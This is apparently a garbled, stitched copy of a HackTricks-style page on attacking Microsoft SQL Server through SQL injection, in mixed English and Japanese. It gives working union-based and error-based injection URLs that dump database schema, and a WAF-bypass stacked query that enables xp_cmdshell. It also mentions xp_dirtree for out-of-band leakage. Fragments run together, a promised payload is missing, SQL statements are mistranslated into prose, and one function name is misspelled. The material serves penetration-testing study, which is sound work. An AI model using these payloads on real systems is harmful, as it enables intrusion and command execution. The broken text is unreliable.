defget_sid(n):domain ='0x0105000000000005150000001c00d1bcd181f1492bdfc236'user = struct.pack('<I', int(n))user = user.hex()returnf"{domain}{user}"#if n=1000, get SID of the user with ID 1000
# Checkif you have itSELECT*FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';# Or doingUsemaster;EXEC sp_helprotect 'fn_xe_file_target_read_file';
# Checkif you have itSELECT*FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';# Or doingUsemaster;EXEC sp_helprotect 'fn_get_audit_file';
# Checkif you have itSELECT*FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';# Or doingUsemaster;EXEC sp_helprotect 'fn_trace_gettabe';
xp_dirtree, xp_fileexists, xp_subdirs
xp_dirtreeなどのストアドプロシージャは、Microsoftによって公式に文書化されていませんが、MSSQL内でのネットワーク操作においてその有用性が他の人々によってオンラインで説明されています。これらのプロシージャは、さまざまな例や投稿で示されているように、Out of Band Dataの情報漏洩によく使用されます。
MSSQL内でカスタム関数を実行するためにCLR UDF (Common Language Runtime User Defined Function)を作成するには、任意の.NET言語で記述され、DLLにコンパイルされたコードをMSSQL内でロードする必要があります。これにはdboアクセス権が必要です。つまり、通常はデータベース接続がsaとして行われるか、管理者ロールで行われる場合にのみ実現可能です。
https://vuln.app/getItem?id=-1'+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto--
In situations where error-based vectors are used, it's crucial to provide an alias or a name. This is because the output of expressions, if not provided with either, cannot be formatted as JSON. Here's an example of how this is done:
```sqlhttps://vuln.app/getItem?id=1'+and+1=(select+concat_ws(0x3a,table_schema,table_name,column_name)a+from+information_schema.columns+for+json+auto)--
For users granted the VIEW SERVER STATE permission on the server, it's possible to see all executing sessions on the SQL Server instance. However, without this permission, users can only view their current session. The currently executing SQL query can be retrieved by accessing sys.dm_exec_requests and sys.dm_exec_sql_text:
To check if you have the VIEW SERVER STATE permission, the following query can be used:
```sql
```sql
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';
## **Little tricks for WAF bypasses**
[Tricks also from here](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
Non-standard whitespace characters: %C2%85 или %C2%A0:
## MSSQL Injection### MSSQL Union-Based InjectionTo perform a union-based SQL injection on a MSSQL database, you can use the following payload in the URL parameter:
This payload will retrieve the version of the MSSQL database.
### WAF Bypass with unorthodox stacked queries
According to [**this blog post**](https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/) it's possible to stack queries in MSSQL without using ";":
```sql
```sql
SELECT 'a' SELECT 'b'
SELECT'a'SELECT'b'
So for example, multiple queries such as:
```sql
```plaintext
[tempdb]を使用する
テーブル[test]を作成する ([id] int)
[test]に値(1)を挿入する
[test]から[id]を選択する
[test]を削除する
Can be reduced to:
```sql
```sql
use[tempdb]create/**/table[test]([id]int)insert[test]values(1)select[id]from[test]drop/**/table[test]
Therefore it could be possible to bypass different WAFs that doesn't consider this form of stacking queries. For example:
select * from users where username = ' admin' exec('sp_configure''show advanced option'',''1''reconfigure') exec('sp_configure''xp_cmdshell'',''1''reconfigure')--
## References
* [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
* [https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/](https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>